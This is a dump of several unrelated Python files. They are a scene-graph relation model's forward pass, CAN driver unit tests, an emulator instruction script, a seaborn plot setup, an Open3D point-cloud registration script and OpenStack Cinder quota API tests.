num_bg_graph = rel_labels_bg.shape[0]
if self.bg_num_rel == -1:
num_bg_rel = rel_labels_bg.shape[0]
if num_bg_graph > 0:
if num_bg_graph < rel_labels_bg.size(0):
rel_labels_bg_ind_graph = random_choose(rel_labels_bg, num_bg_graph, re_id=True)
rel_labels_graph_bg_ch = rel_labels_bg[rel_labels_bg_ind_graph].contiguous()
rel_labels_graph_offset_bg_ch = rel_labels_offset_bg[rel_labels_bg_ind_graph].contiguous()
else:
rel_labels_graph_bg_ch = rel_labels_bg
rel_labels_graph_offset_bg_ch = rel_labels_offset_bg
rel_labels_graph = torch.cat([rel_labels_fg, rel_labels_graph_bg_ch], 0)
rel_labels_offset_graph = torch.cat([rel_labels_offset_fg, rel_labels_graph_offset_bg_ch], 0)
else:
rel_labels_graph = rel_labels_fg
rel_labels_offset_graph = rel_labels_offset_fg
if num_bg_rel > 0:
if num_bg_rel < rel_labels_bg.size(0):
rel_labels_bg_ind_rel = random_choose(rel_labels_bg, num_bg_rel, re_id=True)
rel_labels_rel_bg_ch = rel_labels_bg[rel_labels_bg_ind_rel].contiguous()
rel_labels_rel_offset_bg_ch = rel_labels_offset_bg[rel_labels_bg_ind_rel].contiguous()
else:
rel_labels_rel_bg_ch = rel_labels_bg
rel_labels_rel_offset_bg_ch = rel_labels_offset_bg
rel_labels_rel = torch.cat([rel_labels_fg, rel_labels_rel_bg_ch], 0)
rel_labels_offset_rel = torch.cat([rel_labels_offset_fg, rel_labels_rel_offset_bg_ch], 0)
else:
rel_labels_rel = rel_labels_fg
rel_labels_offset_rel = rel_labels_offset_fg
result.rel_labels_rel = rel_labels_rel
result.rel_labels_offset_rel = rel_labels_offset_rel
result.rel_labels_graph = rel_labels_graph
result.rel_labels_offset_graph = rel_labels_offset_graph
_, perm_rel = torch.sort(result.rel_labels_rel[:, 0] * (boxes.size(0) ** 2)
+ result.rel_labels_rel[:, 1] * boxes.size(0)
+ result.rel_labels_rel[:, 2])
result.rel_labels_rel = result.rel_labels_rel[perm_rel]
result.rel_labels_offset_rel = result.rel_labels_offset_rel[perm_rel]
_, perm_graph = torch.sort(result.rel_labels_graph[:, 0] * (boxes.size(0) ** 2)
+ result.rel_labels_graph[:, 1] * boxes.size(0)
+ result.rel_labels_graph[:, 2])
result.rel_labels_graph = result.rel_labels_graph[perm_graph]
result.rel_labels_offset_graph = result.rel_labels_offset_graph[perm_graph]
num_true_rel = rel_labels_fg.shape[0]
_, num_true_rel_ind = torch.sort(perm_rel)
num_true_rel_ind = num_true_rel_ind[:num_true_rel]
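            # num_true_rel_ind records where the foreground (ground-truth) relation rows ended up after
            # the sort above, so later losses can still index the positive pairs directly.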
result.num_true_rel = num_true_rel_ind
else :
result.gt_adj_mat_graph = gt_adj_mat
#print('result.rel_labels_graph',result.rel_labels_graph)
#print('result.rel_labels_offset_graph', result.rel_labels_offset_graph)
#print('result.rel_labels_rel', result.rel_labels_rel)
#print('result.rel_labels_offset_rel', result.rel_labels_offset_rel)
#print('result.gt_adj_mat_graph', result.gt_adj_mat_graph)
if self.mode != 'sgdet':
gt_mul_label_num = gt_mul_label_num
result.gt_mul_label = gt_mul_label
result.gt_mul_rel = gt_mul_rel
else :
gt_mul_label_num = result.gt_multi_label_num
result.gt_mul_label = result.gt_mul_label
result.gt_mul_rel = result.gt_mul_rel
if self.mode != 'predcls_nongtbox':
rel_inds_graph, rel_inds_offset_graph = self.get_rel_inds(result.rel_labels_graph, result.rel_labels_offset_graph, im_inds, boxes)
rel_inds_rel, rel_inds_offset_rel = self.get_rel_inds(result.rel_labels_rel, result.rel_labels_offset_rel, im_inds, boxes)
            # rel_inds: shape [num_rels, 3]; each row is [img_ind, box_ind1, box_ind2] during training
rois = torch.cat((im_inds[:, None].float(), boxes), 1)
result.obj_fmap = self.obj_feature_map(result.fmap.detach(), rois)
# Prevent gradients from flowing back into score_fc from elsewhere
if (self.training or self.mode == 'predcls') and self.mode != 'predcls_nongtbox':
obj_labels = result.rm_obj_labels
elif self.mode == 'predcls_nongtbox':
rois, obj_labels, _, _, _, rel_labels = self.detector.gt_boxes(None, im_sizes, image_offset, gt_boxes,
gt_classes, gt_rels, train_anchor_inds, proposals=proposals)
im_inds = rois[:, 0].long().contiguous()
gt_boxes = rois[:, 1:]
rel_inds = self.get_rel_inds(rel_labels, im_inds, gt_boxes)
result.rel_labels = rel_labels
result.rm_obj_labels = obj_labels
else :
obj_labels = None
vr_graph = self.visual_rep(result.fmap.detach(), rois, rel_inds_graph[:, 1:], type='graph')
vr_rel = self.visual_rep(result.fmap.detach(), rois, rel_inds_rel[:, 1:], type='rel')
if result.rel_labels_graph is None or ( not self.training ):
rel_label = None
else:
rel_label = result.rel_labels_graph[:,-1]
''' '''
if result.gt_adj_mat_graph is not None:
gt_adj_mat = result.gt_adj_mat_graph[rel_inds_graph[:, 1], \
rel_inds_offset_graph[:, 2]].type(torch.cuda.LongTensor).type_as(result.fmap.data)
else:
gt_adj_mat = None
result.rm_obj_dists, result.obj_preds_nozeros, result.obj_preds_zeros, edge_ctx, edge_sub_ctx, edge_obj_ctx, obj_feat_att, obj_feat_att_w, \
adj_mat_rel, adj_mat_obj, keep_union, rel_inds_nms, rel_dists, result.mul_dist = self.context(
obj_fmaps = result.obj_fmap,
obj_logits = result.rm_obj_dists.detach(),
im_inds = im_inds,
obj_labels = obj_labels,
box_priors = boxes.data,
boxes_per_cls = result.boxes_all,
obj_feat_im_inds = obj_feat_im_inds,
f_map = result.fmap,
union_feat=vr_graph, rel_inds=rel_inds_graph.clone(), rel_inds_offset=rel_inds_offset_graph,
gt_adj_mat=gt_adj_mat,
rel_label=rel_label,
label_prior=result.obj_preds,
num_box=num_box,
)
result.att_alpha = obj_feat_att_w
result.im_inds = im_inds
result.obj_feat_im_inds = obj_feat_im_inds
result.pre_adj_mat_rel = adj_mat_rel
result.pre_adj_mat_obj = adj_mat_obj
result.keep_union = keep_union
if self.mode == 'detclass' :
if self.training:
return result
else:
rm_obj_softmax = F.softmax(result.rm_obj_dists, dim=-1)
obj_preds = rm_obj_softmax[:, 1:].max(-1)[1] + 1
twod_inds = arange(obj_preds.data) * self.num_classes + obj_preds.data
obj_scores = F.softmax(result.rm_obj_dists, dim=-1)
obj_scores = obj_scores.cpu().data.numpy()
obj_preds = obj_preds.cpu().data.numpy()
rm_box_priors = result.rm_box_priors.cpu().data.numpy()
return rm_box_priors, obj_preds, obj_scores
if self.edge_ctx_type != 'union':
if edge_ctx is None:
edge_rep = self.post_emb(result.obj_preds)
else:
subj_rep = self.post_sub_lstm(edge_sub_ctx)
obj_rep = self.post_obj_lstm(edge_obj_ctx)
# Split into subject and object representations
#edge_rep = edge_rep.view(edge_rep.size(0), 2, self.pooling_dim)
subj_rep = F.dropout(subj_rep, self.dropout_rate, training=self.training)
obj_rep = F.dropout(obj_rep, self.dropout_rate, training=self.training)
#subj_rep = edge_rep[:, 0]
#obj_rep = edge_rep[:, 1]
obj_rel_ind = rel_inds_rel
vr_obj = vr_rel
subj_rep_rel = subj_rep[obj_rel_ind[:, 1]]
obj_rep_rel = obj_rep[obj_rel_ind[:, 2]]
#prod_rep = subj_rep[obj_rel_ind[:, 1]] * obj_rep[obj_rel_ind[:, 2]]
if self.use_vision:
if self.mode != 'predcls_nongtbox':
vr_obj = vr_obj
else :
vr_obj = 0.5 * (obj_feat_att[obj_rel_ind[:, 1]] + obj_feat_att[obj_rel_ind[:, 2]])
if self.limit_vision:
# exact value TBD
subj_rep_rel = torch.cat((subj_rep_rel[:,:2048] * subj_rep_rel[:,:2048], subj_rep_rel[:,2048:]), 1)
obj_rep_rel = torch.cat((obj_rep_rel[:, :2048] * obj_rep_rel[:, :2048], obj_rep_rel[:, 2048:]), 1)
else:
subj_rep_rel = subj_rep_rel * vr_obj[:,:self.pooling_dim]
obj_rep_rel = obj_rep_rel * vr_obj[:,:self.pooling_dim]
if self.use_tanh:
subj_rep_rel = F.tanh(subj_rep_rel)
obj_rep_rel = F.tanh(obj_rep_rel)
if self.with_biliner_score:
result.rel_dists = self.bilinear_score(subj_rep_rel, obj_rep_rel)
else:
prod_rep = subj_rep_rel * obj_rep_rel
result.rel_dists = self.rel_compress(prod_rep)
elif self.edge_ctx_type == 'union':
obj_rel_ind = rel_inds_nms
result.rel_dists = rel_dists
rel_inds_rel = rel_inds_nms
result.rel_labels_rel = result.rel_labels_graph
if keep_union is not None:
result.rel_labels_rel = result.rel_labels_graph[keep_union]
if self.use_bias and self.edge_ctx_type != 'union':
if self.mode != 'sgdet':
rel_obj_preds = result.obj_preds_nozeros.clone()
else:
rel_obj_preds = result.obj_preds_nozeros.clone()
'''
if self.training:
rel_obj_preds = result.rm_obj_labels.clone()
else:
rel_obj_preds = result.rm_obj_dists.max(1)[1]
'''
if self.with_adaptive:
sen_vis_score = self.adp_bilinear_score(subj_rep_rel * obj_rep_rel,
vr_obj[:, :self.pooling_dim])
result.rel_dists = sen_vis_score[:, 0, None] * result.rel_dists \
+ sen_vis_score[:, 1, None] * \
self.freq_bias.index_with_labels(torch.stack((
rel_obj_preds[obj_rel_ind[:, 1]],
rel_obj_preds[obj_rel_ind[:, 2]],
), 1))
else:
freq_bias_so = self.freq_bias.index_with_labels(torch.stack((
rel_obj_preds[obj_rel_ind[:, 1]],
rel_obj_preds[obj_rel_ind[:, 2]],
), 1))
result.rel_dists = result.rel_dists + freq_bias_so
if self.training:
if self.with_cosine_dis:
                self.obj_glove_vec = self.obj_glove_vec.contiguous().cuda(obj_rel_ind.get_device(), non_blocking=True)
                self.rel_glove_vec = self.rel_glove_vec.contiguous().cuda(obj_rel_ind.get_device(), non_blocking=True)
fg_ind = result.num_true_rel.data
obj_label_1 = result.rm_obj_labels[obj_rel_ind[fg_ind][:, 1]].data
obj_label_2 = result.rm_obj_labels[obj_rel_ind[fg_ind][:, 2]].data
rel_label = result.rel_labels_rel[fg_ind][:, -1].data
sub_glove_vec = self.obj_glove_vec[obj_label_1]
obj_glove_vec = self.obj_glove_vec[obj_label_2]
rel_glove_vec = self.rel_glove_vec[rel_label]
all_glove_vec = torch.cat([sub_glove_vec, rel_glove_vec, obj_glove_vec], -1)
all_rel_num = all_glove_vec.shape[0]
all_rel_ind = np.arange(all_rel_num)
all_rel_mat = np.ones([all_rel_num,all_rel_num])
all_rel_mat[all_rel_ind,all_rel_ind] = 0.
all_rel_ind_1, all_rel_ind_2 = all_rel_mat.nonzero()
                all_rel_ind_1 = torch.LongTensor(all_rel_ind_1).contiguous().cuda(obj_rel_ind.get_device(), non_blocking=True)
                all_rel_ind_2 = torch.LongTensor(all_rel_ind_2).contiguous().cuda(obj_rel_ind.get_device(), non_blocking=True)
all_glove_cosine_dis = F.cosine_similarity(all_glove_vec[all_rel_ind_1], all_glove_vec[all_rel_ind_2])
all_rep = (subj_rep_rel * obj_rep_rel)[fg_ind]
all_rep_cosine_dis = F.cosine_similarity(all_rep[all_rel_ind_1], all_rep[all_rel_ind_2])
result.all_rep_glove_rate = all_rep_cosine_dis / ( Variable(all_glove_cosine_dis) + 1e-8 )
return result
twod_inds = arange(result.obj_preds_nozeros.data) * self.num_classes + result.obj_preds_nozeros.data
result.obj_scores = F.softmax(result.rm_obj_dists, dim=1).view(-1)[twod_inds]
result.pre_adj_mat_rel = F.softmax(result.pre_adj_mat_rel, dim=-1)
result.pre_adj_mat_obj = F.softmax(result.pre_adj_mat_obj, dim=-1)
# Bbox regression
if self.mode == 'sgdet':
bboxes = result.boxes_all.view(-1, 4)[twod_inds].view(result.boxes_all.size(0), 4)
elif self.mode == 'predcls_nongtbox':
bboxes = gt_boxes
else:
# Boxes will get fixed by filter_dets function.
bboxes = result.rm_box_priors
rel_rep = F.softmax(result.rel_dists, dim=1)
return filter_dets(ids, im_inds, bboxes, result.obj_scores,
result.obj_preds_nozeros, result.pre_adj_mat_rel[:,1],
result.pre_adj_mat_obj[:,1] if result.pre_adj_mat_obj is not None else None,
rel_inds_rel[:, 1:],
rel_rep,
nongt_box=self.mode=='predcls_nongtbox', with_adj_mat = self.with_adj_mat,
with_gt_adj_mat=self.with_gt_adj_mat, gt_adj_mat=gt_adj_mat,
alpha=self.test_alpha, feat=subj_rep_rel*obj_rep_rel,
ext_feat=self.ext_feat,
mode=self.mode)
def __getitem__(self, batch):
""" Hack to do multi-GPU training"""
batch.scatter()
if self.num_gpus == 1:
return self(*batch[0])
replicas = nn.parallel.replicate(self, devices=list(range(self.num_gpus)))
outputs = nn.parallel.parallel_apply(replicas, [batch[i] for i in range(self.num_gpus)])
if self.training:
return gather_res(outputs, 0, dim=0)
return outputs
|
py | 7dfa802f662ed83dd9c8b7aae7c97382486f94c7 | # -*- coding: utf-8 -*-
# Copyright (c) 2013 The pycan developers. All rights reserved.
# Project site: https://github.com/questrail/pycan
# Use of this source code is governed by a MIT-style license that
# can be found in the LICENSE.txt file for the project.
import os
import time
import threading
import unittest
from pycan.basedriver import *
from pycan.common import CANMessage
def measure_performance(driver, rate, run_time=3.0):
expected_counts = run_time / rate
tic = time.time()
t_stats = []
obc = 0
while driver.total_outbound_count < expected_counts:
if obc != driver.total_outbound_count:
toc = time.time()
t_stats.append(toc - tic)
tic = toc
obc = driver.total_outbound_count
ret = (max(t_stats)*1000.0, min(t_stats)*1000.0, (sum(t_stats) / float(len(t_stats))) * 1000.0)
print "\nTarget:%1.1f (ms)\nMax %1.1f\nMin %1.1f\nAvg %1.1f" % (rate*1000.0, ret[0], ret[1], ret[2])
return ret
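# Illustrative use (a sketch; assumes a driver with a cyclic message already scheduled at `rate` seconds):
#   drv = BaseDriver(max_in=500, max_out=500, loopback=False)
#   drv.add_cyclic_message(CANMessage(1, [1]), 0.1)
#   max_ms, min_ms, avg_ms = measure_performance(drv, 0.1, run_time=5.0)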
class CANDriverTests(unittest.TestCase):
def setUp(self):
self.driver = None
def tearDown(self):
try:
self.driver.shutdown()
time.sleep(1)
        except Exception:
pass
def testPEP8Compliance(self):
# Ensure PEP8 is installed
try:
import pep8
except ImportError:
self.fail(msg="PEP8 not installed.")
# Check the CAN driver
basedriver = os.path.abspath('pycan/basedriver.py')
pep8_checker = pep8.Checker(basedriver)
violation_count = pep8_checker.check_all()
error_message = "PEP8 violations found: %d" % (violation_count)
self.assertTrue(violation_count == 0, msg = error_message)
def testAddReceiveHandler(self):
self.driver = BaseDriver(max_in=500, max_out=500, loopback=False)
def test_handler(message):
pass
self.assertTrue(self.driver.add_receive_handler(test_handler),
msg="Unable to add a generic handler")
can_id = 0x12345
self.assertTrue(self.driver.add_receive_handler(test_handler, can_id),
msg="Unable to add an ID specific handler")
can_id_2 = 0x123456
self.assertTrue(self.driver.add_receive_handler(test_handler, can_id_2),
msg="Unable to add multiple specific handlers")
def testMessageQueues(self):
self.driver = BaseDriver(max_in=2, max_out=2, loopback=False)
msg1 = CANMessage(0x123, [1,2])
msg2 = CANMessage(0x1234, [1,2,3])
self.assertTrue(self.driver.send(msg1))
self.assertTrue(self.driver.send(msg2))
time.sleep(.5) # Allow time for the queue to be processed
self.assertTrue(self.driver.total_outbound_count == 2, msg="Message not added to outbound queue")
self.assertTrue(self.driver.total_inbound_count == 0, msg="Loopback placed a message in the queue" )
self.assertFalse(self.driver.send(msg1), msg="Max outbound queue size not honored")
time.sleep(.5) # Allow time for the queue to be processed
self.assertTrue(self.driver.total_outbound_count == 2, msg="Max outbound queue size not honored")
self.assertTrue(self.driver.total_inbound_count == 0, msg="Loopback placed a message in the queue" )
def testMessageLoopback(self):
self.driver = BaseDriver(max_in=5, max_out=2, loopback=True)
msg1 = CANMessage(0x123, [1,2])
msg2 = CANMessage(0x1234, [1,2,3])
self.assertTrue(self.driver.send(msg1))
self.assertTrue(self.driver.send(msg2))
self.assertTrue(self.driver.total_outbound_count == 2,
msg="Message not added to outbound queue")
time.sleep(.5) # Allow time for the queue to be processed
self.assertTrue(self.driver.total_inbound_count == 2,
msg="Loopback didn't add message to inbound: %d" %self.driver.total_inbound_count )
self.assertFalse(self.driver.send(msg1))
self.assertTrue(self.driver.total_outbound_count == 2,
msg="Max outbound queue size not honored")
time.sleep(.5) # Allow time for the queue to be processed
self.assertTrue(self.driver.total_inbound_count == 2,
msg="Loopback still placed the message in the outbound: %d" % self.driver.total_inbound_count)
def testReceiveHandlers(self):
self.driver = BaseDriver(max_in=500, max_out=500, loopback=False)
msg1 = CANMessage(0x123, [1,2])
msg2 = CANMessage(0x1234, [1,2,3])
msg3 = CANMessage(0x12345, [1,2,3,4])
spec_event1 = threading.Event()
spec_event1.clear()
spec_event2 = threading.Event()
spec_event2.clear()
spec_event3 = threading.Event()
spec_event3.clear()
gen_event1 = threading.Event()
gen_event1.clear()
gen_event2 = threading.Event()
gen_event2.clear()
gen_event3 = threading.Event()
gen_event3.clear()
def msg1_handler(message):
if msg1 is message:
spec_event1.set()
def msg2_handler(message):
if msg2 is message:
spec_event2.set()
def msg3_handler(message):
if msg3 is message:
spec_event3.set()
def gen_handler(message):
if msg1 is message:
gen_event1.set()
if msg2 is message:
gen_event2.set()
if msg3 is message:
gen_event3.set()
# Add the handlers
self.driver.add_receive_handler(msg1_handler, msg1.id)
self.driver.add_receive_handler(msg2_handler, msg2.id)
self.driver.add_receive_handler(msg3_handler, msg3.id)
self.driver.add_receive_handler(gen_handler)
# Force messages in the inbound queue
self.driver.inbound.put(msg1)
self.driver.inbound.put(msg2)
self.driver.inbound.put(msg3)
# Allow some time for the messages to be processed
time.sleep(1)
# Check the specific handlers
self.assertTrue(spec_event1.isSet(), msg="Message 1 specific handler failed")
self.assertTrue(spec_event2.isSet(), msg="Message 2 specific handler failed")
self.assertTrue(spec_event3.isSet(), msg="Message 3 specific handler failed")
# Check the generic handler
self.assertTrue(gen_event1.isSet(), msg="Message 1 generic handler failed")
self.assertTrue(gen_event2.isSet(), msg="Message 2 generic handler failed")
self.assertTrue(gen_event3.isSet(), msg="Message 3 generic handler failed")
def testCyclicPerformance_1000ms(self):
self.driver = BaseDriver(max_in=500, max_out=500, loopback=False)
self.__performance_test(self.driver, 1, 5.0, [1.75, 1.00, 1.5])
def testCyclicPerformance_100ms(self):
self.driver = BaseDriver(max_in=500, max_out=500, loopback=False)
self.__performance_test(self.driver, .1, 5.0, [1.00, .1, .175])
def testCyclicPerformance_10ms(self):
self.driver = BaseDriver(max_in=500, max_out=500, loopback=False)
self.__performance_test(self.driver, .01, 5.0, [.5, .01, .075])
def testCyclicAdd(self):
self.driver = BaseDriver(max_in=500, max_out=500, loopback=False)
msg1 = CANMessage(1, [1])
msg2 = CANMessage(2, [1,2])
# Add and start some cyclic messages
self.assertTrue(self.driver.add_cyclic_message(msg1, .1), msg="Unable to add cyclic message")
self.assertTrue(self.driver.add_cyclic_message(msg2, .1, "ETC2"), msg="Unable to add cyclic message")
time.sleep(1) # allow time for the cyclic messages to send
qsize = self.driver.total_outbound_count
self.assertTrue(qsize > 10, msg="Q Size: %d" % qsize)
self.assertTrue(self.driver.stop_cyclic_message(msg1.id), msg="Unable to stop cyclic message")
self.assertTrue(self.driver.stop_cyclic_message("ETC2"), msg="Unable to stop cyclic message")
def testCyclicOperation(self):
self.driver = BaseDriver(max_in=500, max_out=500, loopback=True)
msg1_evt = threading.Event()
msg1_evt.clear()
msg2_evt = threading.Event()
msg2_evt.clear()
msg3_evt = threading.Event()
msg3_evt.clear()
msg1 = CANMessage(1, [1])
msg2 = CANMessage(2, [1,2])
msg3 = CANMessage(2, [3,4])
def msg1_handler(message):
if msg1 is message:
msg1_evt.set()
def msg2_handler(message):
if msg2 is message:
msg2_evt.set()
elif msg3 is message:
msg3_evt.set()
# Add the message handlers
self.driver.add_receive_handler(msg1_handler, msg1.id)
self.driver.add_receive_handler(msg2_handler, msg2.id)
# Add and start some cyclic messages
self.assertTrue(self.driver.add_cyclic_message(msg1, .1, "Message 1"), msg="Unable to add cyclic message")
self.assertTrue(self.driver.add_cyclic_message(msg2, .1, "Message 2"), msg="Unable to add cyclic message")
# Wait for the cyclic messages to send
msg1_evt.wait(5.0)
msg2_evt.wait(5.0)
# Update message 2 payload
self.assertTrue(self.driver.update_cyclic_message(msg3, "Message 2"), msg="Unable to update cyclic message")
# Wait for the cyclic messages to send
msg3_evt.wait(5.0)
# Ensure messages were sent out
self.assertTrue(msg1_evt.isSet(), msg="Message 1 not received")
self.assertTrue(msg2_evt.isSet(), msg="Message 2 not received")
self.assertTrue(msg3_evt.isSet(), msg="Message 2 not updated")
self.assertTrue(self.driver.stop_cyclic_message("Message 1"), msg="Unable to stop cyclic message")
self.assertTrue(self.driver.stop_cyclic_message("Message 2"), msg="Unable to stop cyclic message")
def __performance_test(self, driver, rate, run_time, tolerances):
# Determine the upper and lower bounds based on the tolerance in seconds
uTarget, lTarget, aTarget = tolerances
        # Scale the seconds to milliseconds
uTarget *= 1000.0
lTarget *= 1000.0
aTarget *= 1000.0
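        # Note: only uTarget and lTarget are used by the assertions below; aTarget is scaled but is
        # currently not compared against the measured average.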
msg1 = CANMessage(1, [1])
# Add and start some cyclic messages
self.assertTrue(self.driver.add_cyclic_message(msg1, rate), msg="Unable to add cyclic message")
max_t, min_t, avg_t = measure_performance(driver, rate, run_time)
self.assertTrue(lTarget < avg_t < uTarget, msg="Avg time (%1.1f) expected to be between %1.1f and %1.1f" % (avg_t, uTarget, lTarget))
self.assertTrue(max_t < uTarget, msg="Max time (%1.1f) expected to be less than %1.1f" % (max_t, uTarget))
self.assertTrue(min_t > lTarget, msg="Min time (%1.1f) expected to be greater than %1.1f" % (min_t, lTarget))
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(CANDriverTests)
unittest.TextTestRunner(verbosity=2).run(suite)
|
py | 7dfa80902641e0a22fee85a95495e7ebe8c72c29 |
import sys, os
import numpy as np
import math
sys.path.insert(0, '/home/tensor/aa_dpe_emulate/include/')
sys.path.insert(0, '/home/tensor/aa_dpe_emulate/src/')
from data_convert import *
from instrn_proto import *
from tile_instrn_proto import *
dict_temp = {}
dict_list = []
i_temp = i_hlt()
dict_list.append(i_temp.copy())
filename = 'large/tile0/core_imem0.npy'
np.save(filename, dict_list)
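# The saved .npy holds the instruction list for tile0/core0 -- here a single halt (hlt) instruction,
# as produced by i_hlt() above.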
|
py | 7dfa8215988340378de3656f65a07009b3c33fb3 | import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
fmri = sns.load_dataset("fmri")
sns.set()
mpl.rcParams['font.family'] = "monospace"
mpl.rcParams['text.color'] = "C1C1CD"
mpl.rcParams['patch.linewidth'] = 0.
mpl.rcParams['axes.facecolor'] = "F5F8F8"
mpl.rcParams['axes.edgecolor'] = "C1C1CD"
mpl.rcParams['xtick.color'] = "C1C1CD"
mpl.rcParams['ytick.color'] = "C1C1CD"
mpl.rcParams['grid.color'] = "E5E7EB"
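# The hex values above omit the leading '#'; matplotlib's rcParams color validator normally accepts
# bare hex strings (it tries prepending '#'), but if a given version rejects them, use e.g. "#C1C1CD".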
sns.relplot(x="timepoint", y="signal", kind="line", data=fmri)
plt.show()
|
py | 7dfa8220351481d4300066accf0de43cf85aba72 | import open3d as o3d
import numpy as np
def load_point_clouds(voxel_size=0.0):
pcds = []
_list = [49, 99]
for i in _list:
#pcd = o3d.io.read_point_cloud("../../test_data/ICP/cloud_bin_%d.pcd" %i)
#pcd = o3d.io.read_point_cloud("../panda/frames/000%d.jpg" %i)
color_raw = o3d.io.read_image("../panda/frames/color/000%d.jpg" %(i))
depth_raw = o3d.io.read_image("../panda/frames/depth/000%d.png" %(i))
rgbd_image = o3d.geometry.RGBDImage.create_from_color_and_depth(color_raw, depth_raw)
pcd = o3d.geometry.PointCloud.create_from_rgbd_image(rgbd_image, o3d.camera.PinholeCameraIntrinsic(o3d.camera.PinholeCameraIntrinsicParameters.PrimeSenseDefault))
pcd_down = pcd.voxel_down_sample(voxel_size=voxel_size)
pcd_down.estimate_normals(search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.1, max_nn=30))
pcds.append(pcd_down)
return pcds
voxel_size = 0.002
pcds_down = load_point_clouds(voxel_size)
"""
o3d.visualization.draw_geometries(pcds_down,
zoom=0.3412,
front=[0.4257, -0.2125, -0.8795],
lookat=[2.6172, 2.0475, 1.532],
up=[-0.0694, -0.9768, 0.2024])
"""
def pairwise_registration(source, target):
print("Apply point-to-plane ICP")
icp_coarse = o3d.pipelines.registration.registration_icp(
source, target, max_correspondence_distance_coarse, np.identity(4),
o3d.pipelines.registration.TransformationEstimationPointToPlane())
icp_fine = o3d.pipelines.registration.registration_icp(
source, target, max_correspondence_distance_fine,
icp_coarse.transformation,
o3d.pipelines.registration.TransformationEstimationPointToPlane())
transformation_icp = icp_fine.transformation
information_icp = o3d.pipelines.registration.get_information_matrix_from_point_clouds(
source, target, max_correspondence_distance_fine,
icp_fine.transformation)
return transformation_icp, information_icp
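# pairwise_registration runs ICP twice on purpose: a coarse pass with a large correspondence distance
# to get a rough alignment, then a fine pass seeded with that result; the information matrix from the
# fine pass is what the pose graph below uses to weight the edge.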
def full_registration(pcds, max_correspondence_distance_coarse,
max_correspondence_distance_fine):
pose_graph = o3d.pipelines.registration.PoseGraph()
odometry = np.identity(4)
pose_graph.nodes.append(o3d.pipelines.registration.PoseGraphNode(odometry))
n_pcds = len(pcds)
    # Every cloud is compared against every later cloud one pair at a time; there is no parallelism
    # here, so this step is extremely slow.
for source_id in range(n_pcds):
for target_id in range(source_id + 1, n_pcds):
transformation_icp, information_icp = pairwise_registration(
pcds[source_id], pcds[target_id])
print("Build o3d.pipelines.registration.PoseGraph")
if target_id == source_id + 1: # odometry case
odometry = np.dot(transformation_icp, odometry)
pose_graph.nodes.append(
o3d.pipelines.registration.PoseGraphNode(
np.linalg.inv(odometry)))
pose_graph.edges.append(
o3d.pipelines.registration.PoseGraphEdge(source_id,
target_id,
transformation_icp,
information_icp,
uncertain=False))
else: # loop closure case
pose_graph.edges.append(
o3d.pipelines.registration.PoseGraphEdge(source_id,
target_id,
transformation_icp,
information_icp,
uncertain=True))
return pose_graph
print("Full registration ...")
max_correspondence_distance_coarse = voxel_size * 15
max_correspondence_distance_fine = voxel_size * 1.5
with o3d.utility.VerbosityContextManager(
o3d.utility.VerbosityLevel.Debug) as cm:
pose_graph = full_registration(pcds_down,
max_correspondence_distance_coarse,
max_correspondence_distance_fine)
print("Optimizing PoseGraph ...")
option = o3d.pipelines.registration.GlobalOptimizationOption(
max_correspondence_distance=max_correspondence_distance_fine,
edge_prune_threshold=0.25,
reference_node=0)
with o3d.utility.VerbosityContextManager(
o3d.utility.VerbosityLevel.Debug) as cm:
o3d.pipelines.registration.global_optimization(
pose_graph,
o3d.pipelines.registration.GlobalOptimizationLevenbergMarquardt(),
o3d.pipelines.registration.GlobalOptimizationConvergenceCriteria(),
option)
print("Transform points and display")
for point_id in range(len(pcds_down)):
print(pose_graph.nodes[point_id].pose)
pcds_down[point_id].transform(pose_graph.nodes[point_id].pose)
o3d.visualization.draw_geometries(pcds_down,
zoom=0.3412,
front=[0.4257, -0.2125, -0.8795],
lookat=[2.6172, 2.0475, 1.532],
up=[-0.0694, -0.9768, 0.2024])
|
py | 7dfa84028501824d0cabc87a273c86db794aae54 | import random
import requests
import json
from creds import *
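# headers(), CINDER_URL, ADMIN_TENANT and DEMO_TENANT used below are expected to come from creds.py.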
def test_fail_if_no_tenant():
_headers = headers()
r = requests.post(
CINDER_URL + 'os-quota-sets',
headers=_headers)
assert 404 == r.status_code
def test_fail_without_ADMIN_TENANT():
_headers = headers()
r = requests.get(
CINDER_URL + 'os-quota-sets/%s' % DEMO_TENANT,
headers=_headers)
assert 404 == r.status_code, r.text
def test_show_quotas_for_user():
_headers = headers()
value1 = 50
r = requests.put(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
json={
"quota_set": {
"volumes": value1
}},
headers=_headers)
assert 200 == r.status_code
value2 = 100
r = requests.put(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
json={
"quota_set": {
"user_id": 1,
"volumes": value2
}},
headers=_headers)
    # the PUT request fails because "user_id" is not a valid quota key
assert 400 == r.status_code, r.text
assert 'Bad key' in r.json()['badRequest']['message']
r = requests.get(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
headers=_headers)
assert value1 == r.json()['quota_set']['volumes']
r = requests.get(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
headers=_headers, params={'user_id': 1})
# get request with user_id just returns quotas for tenant
assert value1 == r.json()['quota_set']['volumes']
def test_show_details():
_headers = headers()
r = requests.get(
CINDER_URL + '%s/os-quota-sets/%s/detail' % (ADMIN_TENANT, DEMO_TENANT),
headers=_headers)
assert 404 == r.status_code, r.text
r = requests.get(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
headers=_headers)
assert 200 == r.status_code, r.text
default = r
r = requests.get(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
headers=_headers, params={'usage': True})
assert 200 == r.status_code, r.text
for i in r.json()['quota_set']:
if i == 'id':
assert default.json()['quota_set'][i] == r.json()['quota_set'][i]
continue
assert default.json()['quota_set'][i] == r.json()['quota_set'][i]['limit']
def test_set_quota_for_tenant():
value = random.randint(1, 100)
_headers = headers()
r = requests.put(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
json={
"quota_set": {
"volumes": value
}},
headers=_headers)
assert 200 == r.status_code, r.text
assert value == r.json()['quota_set']['volumes']
r = requests.get(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
headers=_headers)
assert 200 == r.status_code
